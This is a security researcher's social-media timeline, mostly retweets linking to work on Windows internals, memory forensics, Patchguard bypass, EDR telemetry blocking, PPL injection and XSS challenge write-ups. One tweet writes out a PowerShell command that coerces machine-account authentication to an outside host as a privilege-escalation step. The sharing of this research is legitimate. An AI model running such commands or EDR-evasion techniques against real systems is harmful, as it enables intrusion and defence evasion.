Maldev, forensic and reverse makes me happy.

Joined October 2018
Naacbin retweeted
22 Jul 2024
I haven't posted anything about Havoc in a while so imma share something I have been working on. Wrote a custom VM/Interpreter (based on the RISC-V instruction set) to execute exploits and other arbitrary code. The client is now fully extendable and scriptable via the Python API
Naacbin retweeted
28 Jun 2024
Excited to share my latest article: PgC - a novel approach to disable Patchguard during runtime using basic memory management principles. It has worked against every version of Patchguard for the last 7 years, without needing any updates! blog.can.ac/2024/06/28/pgc-g…
Naacbin retweeted
Didn't check the code yet, but looks like SilverPotato and CertifiedDCOM have a working public weaponized tool by now: github.com/CICADA8-Research/… That's huge news from my perspective🔥
Naacbin retweeted
I wrote a blogpost on injecting code into a PPL process on Windows 11, without abusing any vulnerable driver. blog.slowerzs.net/posts/ppls…
Naacbin retweeted
27 Mar 2024
I just published the long-awaited Part 2 to my PCIe blog post series - "All About Memory: MMIO, DMA, TLPs, and more!" This post also includes a companion experiment where I dive into what pcileech looks like over a PCIe protocol analyzer. Please enjoy! ctf.re/kernel/pcie/tutorial/…
Naacbin retweeted
Here is my #Friday #giveaways! Like, retweet and share with your network... I'll randomly choose on Monday 4/1 two winners to get the full "C5W Certified Malware Analysis" course and certification for FREE... You should not miss this! #DFIR #Malware academy.cyber5w.com/courses/…
Naacbin retweeted
25 Mar 2024
Exciting news: VolWeb 2.0 is out! This digital forensics memory analysis platform leverages the capabilities of @volatility 3 framework. With significant enhancements, it now offers improved flexibility and scalability! github.com/k1nd0ne/VolWeb. 1/8
Naacbin retweeted
23 Mar 2024
New lab 🏰 for the GOAD project 🥳: SCCM. You can now test the SCCM/MECM attacks locally on VirtualBox or VMware. More information here: mayfly277.github.io/posts/SC… Repository here: github.com/Orange-Cyberdefen… Thx again @KenjiEndo15 for your help building this!
Naacbin retweeted
21 Mar 2024
I just spent the last few months of my life reverse engineering the Windows 10 parallel loader and figuring out how it does concurrency. Updates have now been published! github.com/ElliotKillick/win…
3 Mar 2024
Over the past few months, I've contributed to the github.com/mandiant/VM-Packa… repository to incorporate forensic packages. As a result, I've developed scripts to automate VM installation for reverse, maldev and forensic purposes. 👇 github.com/naacbin/SecLab
Naacbin retweeted
3 Feb 2024
I documented github.com/corkami/docs/blob… and made 'low alignment PEs' (PoCs @ github.com/corkami/pocs/blob…) around 2009, but I'm pretty sure this was known before. Any early case of an ITW low-align PE? cc @Hexacorn @a2_qkumba @hasherezade @rwfpl

First blog post in a while! This article describes an undocumented trick to embed executable code within (what appears to be) a read-only PE section. secret.club/2023/06/05/spoof…
Naacbin retweeted
Challenge time is now over ⏰ TL;DR - HTML injection - Axios DOM Based CSPP - Axios CSPP response overwrite gadget - jQuery DOM Clobbering CSPP selector overwrite gadgets - Setting src attr to "javascript:" for each HTML node ➝ XSS Detailed writeup 👇 mizu.re/post/intigriti-janua…

GG to all the solvers! However, no one solved it in the intended way :p Before giving my solution, I'm extending the challenge for another week with a fixed version! If you find the solution, please send me a DM 📮 The challenge is accessible here 👇 mizu.re:3000/
Naacbin retweeted
11 Jan 2024
Did you know you don't need to use a potato exploit to go from the IIS AppPool account to admin or SYSTEM? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials to get an HTTP coerce of the machine account. 👇🧵
Naacbin retweeted
29 Dec 2023
OST cannot be stopped. Here is a technique we tested internally 9 months ago: blocking EDR telemetry by leveraging the Windows Filtering Platform. We considered it so evil that we didn't publish it at the time. That was pointless; now here it is by @netero_1010: github.com/netero1010/EDRSil…
Naacbin retweeted
Exegol holiday release is live 🎄🎁🎅 New remote graphical desktop, image entrypoint, container startup script, new tools, improved pipeline, doc, etc. Many big things! github.com/ThePorgs/Exegol/r… github.com/ThePorgs/Exegol-i… gg to the team @Dramelac_ @QU35T_TV 👏 and all contributors.
Naacbin retweeted
14 Dec 2023
Read our latest blog to find out how our Security Research Team reverse-engineered Windows Defender to uncover previously undocumented artefacts, which can now be recovered using Dissect! blog.fox-it.com/2023/12/14/r…
30 Nov 2023
I have made 2 writeups for #ECSC2023 and #DGhAck. For the 2nd one, I used github.com/naacbin/CovenantD… [1] Recovering PDF using DataRun of $LogFile > naacbin.gitlab.io/data-on-th… [2] Decrypt empire C2 communication by extracting private key from memory > naacbin.gitlab.io/empire-c2/
Naacbin retweeted
30 Oct 2023
Time to make @volatility 3 compatible with modern Windows hibernation file analysis. Blog post: forensicxlab.com/posts/hiber… Feature: tinyurl.com/5n8u4nr9 Special thanks to @chadtilbury, who gave me the motivation, and to @jtsylve, @vicomarziale and @nolaforensix for the incredible work.

Naacbin retweeted
Excited to launch my first browser extension, DOMLogger! Now available for both Firefox and Chromium! 🎉 DOMLogger allows you to monitor, intercept, and debug JavaScript sinks based on customizable configurations 🔥 Check it out 👇 github.com/kevin-mizu/domlog… 1/5
Naacbin retweeted
17 Oct 2023
GOAD update available 🥳 - Azure provider is now supported thx to @Zeph_RooT! - Two versions of the lab are available (a light version with 3 computers has been added). - Some scripts to help install. - Refactoring to simplify adding labs and providers. github.com/Orange-Cyberdefen…